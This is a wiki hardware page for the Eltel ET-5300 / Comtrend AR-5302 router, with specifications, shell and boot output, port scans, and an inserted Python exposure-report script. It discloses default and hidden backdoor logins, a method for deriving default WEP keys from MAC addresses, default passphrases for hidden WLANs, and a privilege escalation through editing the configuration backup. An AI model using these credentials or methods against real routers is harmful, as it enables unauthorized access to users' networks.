Eltel ET-5300

From WikiDevi.Wi-Cat.RU

Eltel ET5300 V1

Manuf (OEM/ODM): Comtrend AR5302

Country of manuf.: China

Type: wireless router, dsl modem

Power: 12 VDC, 1 A
Connector type: barrel

CPU1: Ralink RT63365E (500 MHz)
FLA1: 8 MiB (Macronix MX25L6406E)
RAM1: 32 MiB (EtronTech EM6AA160TSB-5G)

Expansion IFs: none specified

WI1 chip1: Ralink RT5390HL
WI1 802dot11 protocols: bgn
WI1 MIMO config: 1x1:1
WI1 antenna connector: U.FL

ETH chip1: Ralink RT63365E
Switch: Ralink RT63365E
LAN speed: 100M
LAN ports: 4
WAN speed: 100M
WAN ports: 1


Additional chips
DSL AFE: Ralink RT63087N

Stock FW OS: Linux 2.6.22.15 TrendChip

Default SSID: TURBONETT_XXXXXX
Default IP address: 192.168.1.1
(the IP 192.168.1.1 is used by 1304 additional devices, of which 0 are Eltel devices)
Default login user: admin
Default login password: c1@r0

802dot11 OUI: F8:8E:85 (2 E, 2 W)
Ethernet OUI: F8:8E:85 (2 E, 2 W)

For a list of all currently documented Ralink chipsets with specifications, see Ralink.


This router is distributed by Claro in large numbers. According to the IEEE Standards MA-L (OUI) database it is manufactured by Comtrend.

Links

Product page

Datasheet
User Manual of similar Upvel UR-314AN (TrendChip firmware)

Components

EM6AA160TSB-5G datasheet
MX25L6406E datasheet

Board, headers, etc

The board layout is somewhat similar to Upvel UR-314AN, Upvel UR-354AN4G (with USB), Huawei HG532s, ZTE ZXHN H108L, and Edimax AR-7186. Silk screen says E241819 50XX13-350.

  • J521 is likely the serial interface.
  • The circuit board is prepared for a USB connector (J500); this needs an additional 5 V regulator (U601).

Images

from User:Zerohero

Info

Bootlog

# cat /proc/kmsg 
<5>Linux version 2.6.22.15 (root@linux.local) (gcc version 4.3.4 (GCC) ) #11 SMP Tue Apr 2 09:57:08 CST 2013
<6>ISPRAM0: PA=00260000,Size=00008000,enabled
<4>Enable SRAM=1c000001
<4>Ralink RT63365 SOC prom init
<4>[DEBUG]Fix eth led for AR-5300
<4>CPU revision is: 00019555
<4>Determined physical RAM map:
<4> memory: 02000000 @ 00000000 (usable)
<7>On node 0 totalpages: 8192
<7>  Normal zone: 64 pages used for memmap
<7>  Normal zone: 0 pages reserved
<7>  Normal zone: 8128 pages, LIFO batch:0
<4>3 available secondary CPU TC(s)
<4>Built 1 zonelists.  Total pages: 8128
<5>Kernel command line: console=ttyS0 rootfstype=squashfs es=1
<4>Primary instruction cache 64kB, physically tagged, 4-way, linesize 32 bytes.
<4>Primary data cache 32kB, 4-way, linesize 32 bytes.
<6>Synthesized TLB refill handler (23 instructions).
<6>Synthesized TLB load handler fastpath (37 instructions).
<6>Synthesized TLB store handler fastpath (37 instructions).
<6>Synthesized TLB modify handler fastpath (36 instructions).
<6>Cache parity protection disabled
<4>PID hash table entries: 128 (order: 7, 512 bytes)
<4>CPU frequency 498.00 MHz
<4>Using 250.000 MHz high precision timer.
<6>console handover: boot [early0] -> real [ttyS0]
<4>Dentry cache hash table entries: 4096 (order: 2, 16384 bytes)
<4>Inode-cache hash table entries: 2048 (order: 1, 8192 bytes)
<6>Memory: 29276k/32768k available (2338k kernel code, 3492k reserved, 346k data, 148k init, 0k highmem)
<6>SLUB: Genslabs=17, HWalign=32, Order=0-1, MinObjects=4, CPUs=4, Nodes=1
<7>Calibrating delay loop... 332.59 BogoMIPS (lpj=1662976)
<4>Mount-cache hash table entries: 512
<4>34K sync es set to 1.
<4>Config7: 0x80080500
<4>FPU Affinity set after 1105 emulations
<4>Limit of 4 TCs set
<4>TLB of 64 entry pairs shared by 2 VPEs
<4>VPE 0: TC 0 1 2, VPE 1: TC 3
<4>IPI buffer pool of 32 buffers
<4>CPU revision is: 00019555
<7>Calibrating delay loop... 249.85 BogoMIPS (lpj=1249280)
<4>TC 1 going on-line as CPU 1
<4>CPU revision is: 00019555
<7>Calibrating delay loop... 249.85 BogoMIPS (lpj=1249280)
<4>TC 2 going on-line as CPU 2
<4>CPU revision is: 00019555
<7>Calibrating delay loop... 249.03 BogoMIPS (lpj=1245184)
<4>TC 3 going on-line as CPU 3
<6>Brought up 4 CPUs
<4>migration_cost=10000
<6>NET: Registered protocol family 16
<4>RT63365_pcie_init
<4>registering PCI controller with io_map_base unset
<6>PCI: Bridge: 0000:00:00.0
<6>  IO window: disabled.
<6>  MEM window: 20000000-200fffff
<6>  PREFETCH window: disabled.
<4>PCI: Enabling device 0000:00:00.0 (0000 -> 0002)
<7>PCI: Setting latency timer of device 0000:00:00.0 to 64
<6>NET: Registered protocol family 8
<6>NET: Registered protocol family 20
<6>NET: Registered protocol family 2
<6>Time: MIPS clocksource has been installed.
<4>IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
<4>TCP established hash table entries: 1024 (order: 1, 12288 bytes)
<4>TCP bind hash table entries: 1024 (order: 1, 8192 bytes)
<6>TCP: Hash tables configured (established 1024 bind 1024)
<6>TCP reno registered
<6>squashfs: version 3.0 (2006/03/15) Phillip Lougher
<6>io scheduler noop registered (default)
<6>ttyS0 at I/O 0xbfbf0003 (irq = 1) is a TC3162
<6>PPP generic driver version 2.4.2
<6>PPP Deflate Compression module registered
<6>PPP BSD Compression module registered
<6>NET: Registered protocol family 24
<6>IMQ starting with 2 devices...
<6>IMQ driver loaded successfully.
<6>	Hooking IMQ after NAT on PREROUTING.
<6>	Hooking IMQ before NAT on POSTROUTING.
<4>tc3162: flash device 0x01000000 at 0x10000000
<6>tc3162: Found SPIFLASH 8MiB MX25L6405D
<5>Creating 7 MTD partitions on "tc3162":
<5>0x00000000-0x00010000 : "bootloader"
<5>0x00010000-0x00020000 : "romfile"
<5>0x00020000-0x00104c6f : "kernel"
<4>mtd: partition "kernel" doesn't end on an erase block -- force read-only
<5>0x00104c6f-0x004c6c6f : "rootfs"
<4>mtd: partition "rootfs" doesn't start on an erase block boundary -- force read-only
<5>0x00020000-0x007c0000 : "tclinux"
<5>0x007c0000-0x00800000 : "reservearea"
<5>0x00000000-0x00800000 : "total_flash"
<4>RT3xxx EHCI/OHCI init.
<4>Netfilter messages via NETLINK v0.30.
<4>nf_conntrack version 0.5.0 (256 buckets, 2048 max)
<4>ctnetlink v0.93: registering with nfnetlink.
<4>nf_conntrack_rtsp v0.6.21 loading
<4>nf_nat_rtsp v0.6.21 loading
<4>ip_tables: (C) 2000-2006 Netfilter Core Team
<6>TCP cubic registered
<6>Initializing XFRM netlink socket
<6>NET: Registered protocol family 1
<6>NET: Registered protocol family 10
<6>lo: Disabled Privacy Extensions
<6>IPv6 over IPv4 tunneling driver
<6>sit0: Disabled Privacy Extensions
<6>NET: Registered protocol family 17
<6>NET: Registered protocol family 15
<6>802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com>
<6>All bugs added by David S. Miller <davem@redhat.com>
<4>VFS: Mounted root (squashfs filesystem) readonly.
<6>Freeing unused kernel memory: 148k freed
<4>module_sel: module license 'unspecified' taints kernel.
<4>
<4>tcfullcone version: tcfullcone V1.1.0.0 (Mar  5 2012-08:25:25).
<4>TC3162 LED Manager 0.1 init
<4>
<4>tcledctrl version: tcledctrl V1.1.0.0 (Apr  2 2013-09:57:18).
<4>tccicmd V1.1.0.0 (Apr  2 2013-09:57:20)
<4>Adapter_Interrupts_Init: Successfully hooked IRQ 29
<4>
<4>Adapter_Interrupts_Init: call back registeredAdapter_EIP93_Init: CmdRing_Handle=81860ffc
<4>Adapter_EIP93_Init: ResRing_Handle=81860ff8
<4>Adapter: Successfully initialized EIP93v2 in ARM mode
<4>PEC_Init: PRNG is initialized
<6>femac.c:v1.00-NAPI 29.Mar.2011
<6>eth0: FE MAC Ethernet address: F8:8E:85:9C:5E:F4
<4>TSARM: TC3162 ATM SAR driver 1.5 init
<4>
<4>tc3162sar V1.2.0.0 (Apr  2 2013-09:57:16)
<4>register autopvc cmd to sys
<4>TSARM: TC3162 ATM SAR driver 1.5 done
<4>ADSL DMT initialization starting
<4>Begin AdslTaskInit.....
<4>End AdslTaskInit
<4>Begin to  request IRQ 20
<4>DMT:Succeed to request IRQ 20
<4>Initializing ADSL F/W 3.20.6.0 ......
<4>Initializing ADSL F/W ........ done 
<4>ADSL HW version: b2, HCLK 166
<4>largeD flag=2 (0:maxD=64, 1:maxD=128, 2:maxD=511)
<4>SRAON
<4>up right away
<4>
<4>tcsmux version: tcsmux V1.1.0.0 (Mar  5 2012-08:25:29).
<4>
<4>tcportbind version: tcportbind V1.1.0.0 (Mar  5 2012-08:25:32).
<4>vlantag_drv_init
<4>the number of cfg node is 68
<4>portbind_init
<4>autopvc_init
<4>logAccess_init LanguageSwitch_init vendorCfgFile_init The number of cache node is 5
<4>WPSActiveStatus = NULL
<4>WPSOOBActive = NULL
<4>ReCounterActive = NULL
<4>WPSGenPinCode = NULL
<4>sslca_write:get Frag Number failed!
<4>The attribute is not in wifiMACTab
<4>
<4>lanHost_read: Create node LanHost !
<4>The remaining IMEM space cannot accommodate section .text.imem !!
<4>Remaining IMEM space: -2280 bytes	Section Size: 728 bytes
<4>PCI: Enabling device 0000:01:00.0 (0000 -> 0002)
<7>PCI: Setting latency timer of device 0000:01:00.0 to 64
<4>Mirror/redirect action on
<5>Ebtables v2.0 registered
<4>igmpsnoop V1.1.0.0 (Mar  5 2012-08:25:26)
<4>
<4>mldsnooping V1.1.0.0 (Mar  5 2012-08:25:28)
<6>eth0: starting interface.
<4>alloc_sram p=bc000800 free=7800
<4>alloc_sram p=bc002800 free=5800
<4>[macInit:2049]Fix eth led for AR-5300
<4>TC2105MJ, <6>Ralink HW NAT Module Enabled
<6>device eth0 entered promiscuous mode
<4>0x1300 = 00064380
<4>jiffies=ffff9274, POLLING_MODE_DETECT_INTV=300
<6>device ra0 entered promiscuous mode
<6>device ra1 entered promiscuous mode
<6>device ra2 entered promiscuous mode
<6>device ra3 entered promiscuous mode
<4>
<4>Enabling SSL security system
<4>SSL security system enabled<7>eth0.1: add 33:33:00:00:00:01 mcast address to master interface
<7>eth0.1: add 01:00:5e:00:00:01 mcast address to master interface
<7>eth0.2: add 33:33:00:00:00:01 mcast address to master interface
<7>eth0.2: add 01:00:5e:00:00:01 mcast address to master interface
<7>eth0.3: add 33:33:00:00:00:01 mcast address to master interface
<7>eth0.3: add 01:00:5e:00:00:01 mcast address to master interface
<7>eth0.4: add 33:33:00:00:00:01 mcast address to master interface
<7>eth0.4: add 01:00:5e:00:00:01 mcast address to master interface
<6>device eth0 left promiscuous mode
<6>br0: port 1(eth0) entering disabled state
<4>ANNEXAIJLM
<4>========================insmod iptable_filter=======================
<6>br0: port 9(eth0.4) entering learning state
<6>br0: port 8(eth0.3) entering learning state
<6>br0: port 7(eth0.2) entering learning state
<6>br0: port 6(eth0.1) entering learning state
<6>br0: port 5(ra3) entering learning state
<6>br0: port 4(ra2) entering learning state
<6>br0: port 3(ra1) entering learning state
<6>br0: port 2(ra0) entering learning state
<6>br0: topology change detected, propagating
<6>br0: port 9(eth0.4) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 8(eth0.3) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 7(eth0.2) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 6(eth0.1) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 5(ra3) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 4(ra2) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 3(ra1) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 2(ra0) entering forwarding state
<4>Radvd function activated!
<4>Enter set first loop, IP addr by radvd
<4>dhcp6s parameter activated by exec!
<4>read WLAN driver from rt_device failed,set with default value!
<4>
<4>Enter cwmp boot, we will start tr69 Process
<4>Parental Control: parental_execute() Enter.
<4>[discovery:613]ifName=nas2, 88:43:e1:07:56:18:55679
<6>br0: starting userspace STP failed, staring kernel STP
<4>Link State: LAN_1 up.
<4>Failed to ioctl br0:0
<7>nas0: no IPv6 routers present
<4>ThreadedTimerCheck: get last for first time
<4>Failed to ioctl br0:0
<7>nas2: no IPv6 routers present

Bootloader

# cfeversion
1.0-004

Strings extracted from bootloader partition:

# cat /dev/mtd0
BootVer:1.0-004
TrendChip Technologies Corp.
ADSL Modem
admin
1234
AR-5302

Firmware

# version
T111-73376CAR-C01_R10

Model

# model
AR-5302

Board ID

# boardid
Board ID = AR-5302

Operating system

# uname -a
Linux tc 2.6.22.15 #11 SMP Tue Apr 2 09:57:08 CST 2013 mips unknown

Build

# build
Build Time: Apr 02 2013 10:04:17

Modules

# cat /proc/modules 
ipt_REDIRECT 800 2 - Live 0xc0156000
iptable_filter 1024 1 - Live 0xc0150000
hw_nat 50256 0 - Live 0xc018a000 (P)
mldsnooping 5088 0 - Live 0xc0158000
igmpsnoop 12256 0 - Live 0xc015b000
ebtable_nat 1024 1 - Live 0xc014e000
ebtable_broute 832 1 - Live 0xc009d000
ebt_ip6 2496 0 - Live 0xc0083000
ebt_ip 1952 0 - Live 0xc0099000
ebtable_filter 992 0 - Live 0xc0081000
ebtables 19744 5 ebtable_nat,ebtable_broute,ebt_ip6,ebt_ip,ebtable_filter, Live 0xc0075000
sch_prio 3744 2 - Live 0xc0059000
sch_htb 15328 0 - Live 0xc007c000
cls_fw 3392 2 - Live 0xc0057000
act_mirred 2704 2 - Live 0xc0055000
rt5390ap 815936 4 - Live 0xc028a000 (P)
brg_shortcut 4816 0 - Live 0xc002a000 (P)
tcvlantag 10080 0 - Live 0xc0071000
tcportbind 3856 0 - Live 0xc0039000
tcsmux 8912 0 - Live 0xc006d000
tc3162_dmt 820720 0 [permanent], Live 0xc01c0000 (P)
tc3162l2sar 61568 2 - Live 0xc0088000 (P)
raeth 58400 2 tc3162_dmt,tc3162l2sar, Live 0xc0042000 (P)
crypto_k 28000 0 - Live 0xc0031000 (P)
tccicmd 67232 4 rt5390ap,tc3162_dmt,tc3162l2sar,raeth, Live 0xc005b000 (P)
tcledctrl 20736 4 rt5390ap,tc3162l2sar,raeth,tccicmd, Live 0xc003b000 (P)
tcfullcone 2160 0 - Live 0xc002f000
module_sel 1312 4 rt5390ap,tcvlantag,tcportbind,tcsmux, Live 0xc002d000 (P)

MTDs

# cat /proc/mtd
dev:    size   erasesize  name
mtd0: 00010000 00010000 "bootloader"
mtd1: 00010000 00010000 "romfile"
mtd2: 000e4c6f 00010000 "kernel"
mtd3: 003c2000 00010000 "rootfs"
mtd4: 007a0000 00010000 "tclinux"
mtd5: 00040000 00010000 "reservearea"
mtd6: 00800000 00010000 "total_flash"

Filesystems

# cat /proc/filesystems
nodev	rootfs
nodev	bdev
nodev	proc
nodev	sockfs
nodev	pipefs
nodev	anon_inodefs
nodev	futexfs
nodev	tmpfs
nodev	devpts
	squashfs
nodev	ramfs

Mounts

# cat /proc/mounts   
rootfs / rootfs rw 0 0
/dev/root / squashfs ro 0 0
proc /proc proc rw 0 0
ramfs /tmp ramfs rw 0 0
devpts /dev/pts devpts rw 0 0

IOmem

# cat /proc/iomem  
00000000-01ffffff : System RAM
  00020000-002688e7 : Kernel code
  002688e8-002bf19f : Kernel data
1fba0000-1fbaffff : rt3xxx-ohci
1fbb0000-1fbbffff : rt3xxx-ehci
20000000-2fffffff : pcie memory space
  20000000-200fffff : PCI Bus #01
    20000000-2000ffff : 0000:01:00.0
      20000000-2000ffff : 0000:01:00.0

IOports

# cat /proc/ioports
1f600000-1f61ffff : pcie IO space

CPUs

# cat /proc/cpuinfo
system type		: Ralink RT63365 SOC
processor		: 0
cpu model		: MIPS 34K V5.5
BogoMIPS		: 332.59
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 64
extra interrupt vector	: yes
hardware watchpoint	: yes
ASEs implemented	: mips16 dsp mt
shadow register sets	: 1
VCED exceptions		: not available
VCEI exceptions		: not available
unaligned accesses	: 227088

processor		: 1
cpu model		: MIPS 34K V5.5
BogoMIPS		: 249.85
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 64
extra interrupt vector	: yes
hardware watchpoint	: yes
ASEs implemented	: mips16 dsp mt
shadow register sets	: 1
VCED exceptions		: not available
VCEI exceptions		: not available
unaligned accesses	: 227088

processor		: 2
cpu model		: MIPS 34K V5.5
BogoMIPS		: 249.85
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 64
extra interrupt vector	: yes
hardware watchpoint	: yes
ASEs implemented	: mips16 dsp mt
shadow register sets	: 1
VCED exceptions		: not available
VCEI exceptions		: not available
unaligned accesses	: 227088

processor		: 3
cpu model		: MIPS 34K V5.5
BogoMIPS		: 249.03
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 64
extra interrupt vector	: yes
hardware watchpoint	: yes
ASEs implemented	: mips16 dsp mt
shadow register sets	: 1
VCED exceptions		: not available
VCEI exceptions		: not available
unaligned accesses	: 227088

Interrupts

# cat /proc/interrupts
           CPU0       CPU1       CPU2       CPU3       
  1:       4717      10601       1043          0            MIPS  TC3162 UART
  9:         84         11        546       1158            MIPS  SMTC_IPI
 10:          0          0          0          0            MIPS  watchdog
 14:          0          0          0          0            MIPS  performance
 20:    1259488    1817925      92279          0            MIPS  dmt20
 22:          0          0          0       2632            MIPS  eth0
 23:          0          0          0          0            MIPS  TSARM
 25:      23156      34192       1825          0            MIPS  ra0
 29:          0          0          0          0            MIPS  safenet-vdriver-eip93
 31:     204088      41065       6946     251974            MIPS  timer
 33:          0          0          0          0            MIPS  bus timeout

ERR:          0

LAN MAC

# mac
MAC Addr: F8:8E:85:9C:5E:F4

Netstat

# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 *:5555                  *:*                     LISTEN      
tcp        0      0 *:domain                *:*                     LISTEN      
tcp        0      0 *:ssh                   *:*                     LISTEN      
tcp        0      0 *:7547                  *:*                     LISTEN      
tcp        0      0 192.168.1.1:ssh         192.168.1.2:58897       ESTABLISHED 
tcp        0      0 *:http                  *:*                     LISTEN      
tcp        0      0 *:ftp                   *:*                     LISTEN      
tcp        0      0 *:domain                *:*                     LISTEN      
tcp        0      0 *:telnet                *:*                     LISTEN      
tcp        0      0 *:https                 *:*                     LISTEN      
udp        0      0 *:sd                    *:*                                 
udp        0      0 *:domain                *:*                                 
udp        0      0 *:bootps                *:*                                 
udp        0      0 *:1900                  *:*                                 
udp        0      0 *:32768                 *:*                                 
udp        0      0 *:dhcpv6-server         *:*                                 
udp        0      0 *:domain                *:*                                 
udp        0      0 *:tftp                  *:*                                 
raw        0      0 *:58                    *:*                     0           
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ACC ]     STREAM     LISTENING     523    /tmp/tcapi_sock
unix  2      [ ]         DGRAM                    2107   
unix  3      [ ]         STREAM     CONNECTED     2089   
unix  3      [ ]         STREAM     CONNECTED     2088   
unix  2      [ ]         STREAM     CONNECTED     1288   
unix  2      [ ]         STREAM     CONNECTED     1284   /tmp/tcapi_sock

Portscan (from Internet)

$ nmap -sS xx.xx.xx.xx
Starting Nmap 6.00 ( http://nmap.org ) at 2014-09-07 19:04 CDT
Nmap scan report for xx.xx.xx.xx
Host is up (0.44s latency).
Not shown: 985 closed ports
PORT     STATE    SERVICE
21/tcp   filtered ftp
22/tcp   filtered ssh
23/tcp   filtered telnet
25/tcp   filtered smtp
53/tcp   open     domain
80/tcp   filtered http
113/tcp  filtered ident
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
161/tcp  filtered snmp
443/tcp  open     https
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
4444/tcp filtered krb524
5555/tcp open     freeciv

Nmap done: 1 IP address (1 host up) scanned in 32.65 seconds

Stimulating port 5555 (from Internet)

$ nc xx.xx.xx.xx 5555
get

HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, POST, PUT
Content-Length: 0
Server: RomPager/4.07 UPnP/1.0

See Wikipedia: Universal_Plug_and_Play, section Access_from_the_Internet, and the Full Disclosure post on RomPager/4.07 UPnP/1.0 (issue: a reboot can be caused when a specially crafted HTTP request is sent).
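The netstat and nmap listings above describe the same device from two sides: what listens locally and what is actually reachable from the Internet. The following Python script, an added example that is not part of the original page, parses both formats (abridged copies of the page's listings are embedded as constructed sample input) and reports which listening TCP services are exposed upstream; the service-name table and the high-risk list are assumptions made for the example.

```python
import re

# Constructed sample input, abridged from the `netstat -a` listing on this page.
NETSTAT_OUTPUT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:5555                  *:*                     LISTEN
tcp        0      0 *:domain                *:*                     LISTEN
tcp        0      0 *:ssh                   *:*                     LISTEN
tcp        0      0 *:7547                  *:*                     LISTEN
tcp        0      0 192.168.1.1:ssh         192.168.1.2:58897       ESTABLISHED
tcp        0      0 *:http                  *:*                     LISTEN
tcp        0      0 *:ftp                   *:*                     LISTEN
tcp        0      0 *:telnet                *:*                     LISTEN
tcp        0      0 *:https                 *:*                     LISTEN
udp        0      0 *:tftp                  *:*
"""

# Constructed sample input, abridged from the `nmap -sS` result on this page (WAN side).
NMAP_OUTPUT = """\
PORT     STATE    SERVICE
21/tcp   filtered ftp
22/tcp   filtered ssh
23/tcp   filtered telnet
53/tcp   open     domain
80/tcp   filtered http
443/tcp  open     https
5555/tcp open     freeciv
"""

# Service names as netstat prints them (from /etc/services) mapped to port numbers (assumed table).
# 7547 (TR-069) and 5555 (UPnP/RomPager) have no name on this firmware and appear numerically.
SERVICE_PORTS = {"ftp": 21, "ssh": 22, "telnet": 23, "domain": 53, "http": 80, "https": 443}

# Services a CPE should not expose towards the WAN; assumed list, used for the risk rating only.
HIGH_RISK = {21: "ftp", 22: "ssh", 23: "telnet", 5555: "upnp (RomPager)", 7547: "tr-069"}


def listening_tcp_ports(netstat_text):
    """Return the set of TCP ports in LISTEN state from `netstat -a` output (UDP is ignored)."""
    ports = set()
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] != "tcp" or fields[5] != "LISTEN":
            continue
        # Local address is "*:port" or "addr:port"; the port may be a name or a number.
        port = fields[3].rsplit(":", 1)[1]
        ports.add(int(port) if port.isdigit() else SERVICE_PORTS[port])
    return ports


def wan_open_ports(nmap_text):
    """Return the TCP ports nmap reports as open; 'filtered' means blocked upstream of the device."""
    ports = set()
    for line in nmap_text.splitlines():
        m = re.match(r"(\d+)/tcp\s+open\b", line)
        if m:
            ports.add(int(m.group(1)))
    return ports


def exposure_report(netstat_text, nmap_text):
    """Split the listening TCP services into Internet-reachable and not reachable (or unscanned)."""
    listening = listening_tcp_ports(netstat_text)
    reachable = wan_open_ports(nmap_text)
    return {
        "internet_reachable": sorted(listening & reachable),
        # Ports missing from the nmap output (e.g. 7547 outside its default port list) land here too.
        "not_reachable_from_wan": sorted(listening - reachable),
        "high_risk_reachable": sorted(p for p in listening & reachable if p in HIGH_RISK),
    }


if __name__ == "__main__":
    for key, ports in exposure_report(NETSTAT_OUTPUT, NMAP_OUTPUT).items():
        print(f"{key}: {ports}")
```

On the page's data only DNS, HTTPS and the RomPager UPnP port on 5555 are reachable from the WAN; the filtered telnet, ftp and ssh ports are blocked upstream, not on the device itself.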

Processes

# ps
  PID  Uid     VmSize Stat Command
    1 admin       452 S   init       
    2 admin           SW< [kthreadd]
    3 admin           SW< [migration/0]
    4 admin           SWN [ksoftirqd/0]
    5 admin           SW< [migration/1]
    6 admin           SWN [ksoftirqd/1]
    7 admin           SW< [migration/2]
    8 admin           SWN [ksoftirqd/2]
    9 admin           SW< [migration/3]
   10 admin           SWN [ksoftirqd/3]
   11 admin           SW< [events/0]
   12 admin           SW< [events/1]
   13 admin           SW< [events/2]
   14 admin           SW< [events/3]
   15 admin           SW< [khelper]
   16 admin           SW< [kblockd/0]
   17 admin           SW< [kblockd/1]
   18 admin           SW< [kblockd/2]
   19 admin           SW< [kblockd/3]
   20 admin           SW  [pdflush]
   21 admin           SW  [pdflush]
   22 admin           SW< [kswapd0]
   23 admin           SW< [aio/0]
   24 admin           SW< [aio/1]
   25 admin           SW< [aio/2]
   26 admin           SW< [aio/3]
   27 admin           SW< [mtdblockd]
   94 admin           SW< [dmtd]
  144 admin      1300 S   /userfs/bin/cfg_manager 
  146 admin      1300 S   /userfs/bin/cfg_manager 
  147 admin      1300 S   /userfs/bin/cfg_manager 
  318 admin           SW  [RtmpCmdQTask]
  319 admin           SW  [RtmpWscTask]
  368 admin       216 S   tcwdog -t 1 /dev/watchdog 
  372 admin       144 S   utelnetd -l /bin/login -d 
  379 admin       676 S   /userfs/bin/boa -c /boaroot -d 
  677 admin       304 S   br2684ctl -c 0 -e 0 -t ubr -p 0 -a 0.0.32 
  691 admin       632 S   pppd unit 0 user claro password claro nodetach holdoff 4 maxfail 0 usepeerdns lcp-echo-interval 30 lcp-echo-failure 3 plugin libpppoe.so nas0 defaultroute noipdefault persist mtu 1492 mru 1492 
  787 admin       304 S   br2684ctl -c 2 -e 0 -t ubr -p 0 -a 0.0.45 
  801 admin       636 S   pppd unit 2 user claro password claro nodetach holdoff 4 maxfail 0 usepeerdns lcp-echo-interval 30 lcp-echo-failure 3 plugin libpppoe.so nas2 defaultroute noipdefault persist mtu 1492 mru 1492 
 1007 admin       440 S   /userfs/bin/radvd -C /etc/radvd.conf -p /var/run/radvd.pid 
 1015 admin       452 S   /userfs/bin/dhcp6s -c /etc/dhcp6s.conf br0 -p /var/run/dhcp6s.pid 
 1039 admin       420 S   /usr/sbin/udhcpd 
 1049 admin       424 S   /userfs/bin/dnsmasq 
 1053 admin      1224 S   /userfs/bin/tr69 
 1235 admin       312 S   /userfs/bin/inetd 
 1248 admin       504 S   /userfs/bin/siproxd --config /etc/alg/siproxd.conf 
 1249 admin       504 S   /userfs/bin/siproxd --config /etc/alg/siproxd.conf 
 1250 admin       180 R   /userfs/bin/tftpd 
 1251 admin       504 S   /userfs/bin/siproxd --config /etc/alg/siproxd.conf 
 1256 admin      1224 S   /userfs/bin/tr69 
 1257 admin      1224 S   /userfs/bin/tr69 
 1279 admin       332 S   init       
 1508 admin       616 R   /userfs/bin/dropbear -i 
 1513 admin       492 R   -sh 

DNSmasq

# dnsmasq --version
Dnsmasq version 2.52  Copyright (c) 2000-2010 Simon Kelley
Compile time options IPv6 GNU-getopt no-RTC no-DBus no-I18N no-DHCP no-TFTP

Dropbear

# dropbear -v       
Unknown argument -v
Dropbear sshd v0.52

EBtables

# ebtables --version
ebtables v2.0.8-2 (May 2007)

Wireless access

In the following description XXXXXX stands for the last 3 octets (in upper case) of the LAN MAC (e.g. LAN MAC=F8:8E:85:9C:5E:F4 --> XXXXXX=9C5EF4). The WLAN MAC is +1 (e.g. F8:8E:85:9C:5E:F5). The WAN MAC is +2 (e.g. F8:8E:85:9C:5E:F6).

  • Default SSID: TURBONETT_XXXXXX (e.g. TURBONETT_9C5EF4)
  • Default WEP key: Made of last 5 octets (in uppercase) of LAN MAC. Can be easily constructed as OUI is always F8:8E:85 (e.g. WEP key=8E859C5EF4).

The router supports 4 WLANs in total. By default SSID2-4 are hidden but active (see screenshots), and can be identified by a specific OUI. SSID2-4 credentials are rarely changed by users, and wireless access is gained easily as defaults are straightforward!

WLAN2

  • Default SSID: TURBONETT_XXXXXX-1 (e.g. TURBONETT_9C5EF4-1)
  • Default WPA/WPA2 passphrase: 1234567890
  • OUI: FA:8E:85

WLAN3

  • Default SSID: TURBONETT_XXXXXX-2 (e.g. TURBONETT_9C5EF4-2)
  • Default WPA/WPA2 passphrase: 1234567890
  • OUI: FE:8E:85

WLAN4

  • Default SSID: TURBONETT_XXXXXX-3 (e.g. TURBONETT_9C5EF4-3)
  • Default WPA/WPA2 passphrase: 1234567890
  • OUI: 02:8E:85

Router login

Login to the ET-5300 is possible using the following protocols.

  • Web interface: http and https (invalid certificate)
  • Console login: telnet and ssh
  • File transfer: tftp and ftp (root directory is /var/tmp)

Many routers distributed by the Claro company use a standard default login, and the ET-5300 is no exception.

  • Default username: admin
  • Default password: c1@r0

The ET-5300 supports 3 login names in total, but only the password for login1 (admin) can be changed in the web interface.

The following credentials for login2 and login3 are taken from the romfile.cfg; login3 works for the web interface (on a subset of functionality) and console ssh login!

Login2

  • Username: qwertyuiop
  • Password: 1234567890

Login3

  • Username: user3
  • Password: 1234567890

(P.S. The Sitecom WLM-3500 is affected by the same backdoor accounts [1].

Another candidate might be the Aztech DSL5001EN [2]).

Romfile

The router's configuration can be saved to the XML formatted romfile.cfg (web interface: Maintenance >> Firmware >> Configuration Backup or simply http://192.168.1.1/romfile.cfg). Editing and then restoring the romfile.cfg offers extended configuration possibilities. Here are some ideas...

Login Credentials

As described above, login2 and login3 have some impractical usernames and passwords. This can be corrected by modifying the parameters of Entry1 and Entry2 (think of better passwords than in this example). The new credentials do work for the web interface and console ssh logins!

<Entry1
    username="user2"
    web_passwd="1234"

<Entry2
    username="user3"
    web_passwd="1234"

Display Mask

Logging in as user2 or user3 offers a web interface with reduced menu / permission:

Note that for both users the Firmware menu is still accessible, which means one can still backup/restore the router's configuration. This allows user2 and user3 to gain full permission! As seen in the romfile.cfg, permissions are defined by the so-called display_mask:

<Entry0
    display_mask="DF FF F7 BF FF DF FF FF FF"
<Entry1
    display_mask="D2 8C 84 8C 8C 8C 8C 8C 8C"
<Entry2
    display_mask="5E 8C 6 8C 8C 8C 8C 8C 8C"

In the following example the display_mask of user3 is not just copied from admin, but set to the maximum possible value. Surprisingly this reveals an additional Advanced Wireless menu, as seen in the screenshots below!

<Entry2
    username="user3"
    web_passwd="1234"
    display_mask="FF FF FF FF FF FF FF FF FF"
